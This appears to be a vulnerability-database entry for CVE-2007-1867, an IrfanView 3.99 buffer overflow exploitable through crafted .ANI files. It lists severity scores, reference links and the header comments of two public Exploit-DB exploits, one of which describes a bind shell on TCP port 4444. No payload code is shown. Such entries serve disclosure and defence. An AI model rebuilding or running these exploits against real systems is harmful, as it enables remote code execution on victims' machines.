CVE-2007-1867
Published 2007-04-04
CVE-2007-1867: Buffer overflow in IrfanView 3.99 allows remote attackers to execute arbitrary code via a crafted animated cursor (ANI) file.
Priority P344 · critical · 10 (CVSS 2.0)
AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 7.91% (94.0th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| irfanview | irfanview | — | — |
No detection rules found.
Exploit-DB
IrfanView 3.99 - '.ani' Local Buffer Overflow (2)
exploitdb·2007-04-09
---
/*
IrfanView 3.99 .ANI File Buffer Overflow (Multiple Targets and port bind shell)
Old Target:
Windows XP Sp2 FR
New targets:
Windows XP SP2 Portuguese Call ESP Addr
Windows XP SP2 English Call ESP Addr
Greetz: Ricardo Fiorelli, Marsu (make this possible.. nice job!), Str0ke , Sekure.org guys!
*/
/* win32_exec - EXITFUNC=process Bind TCP port 4444 http://metasploit.com */
Exploit-DB
IrfanView 3.99 - '.ani' Local Buffer Overflow (1)
exploitdb·2007-04-02
---
/***************************************************************************
* IrfanView 3.99 .ANI File Buffer Overflow *
* *
* *
* IrfanView is vulnerable to a buffer overflow when opening a crafted .ani *
* file. The overflow occurs while it is creating a snapshot of the file. *
* This exploit launches calc.exe. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu *
* *
* Note: this has nothing in common with the LoadAniIcon Stack Overflow. *
***************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
No writeups or analysis indexed.
http://secunia.com/advisories/24725
http://www.securityfocus.com/bid/23262
http://www.vupen.com/english/advisories/2007/1210
https://exchange.xforce.ibmcloud.com/vulnerabilities/33386
https://www.exploit-db.com/exploits/3648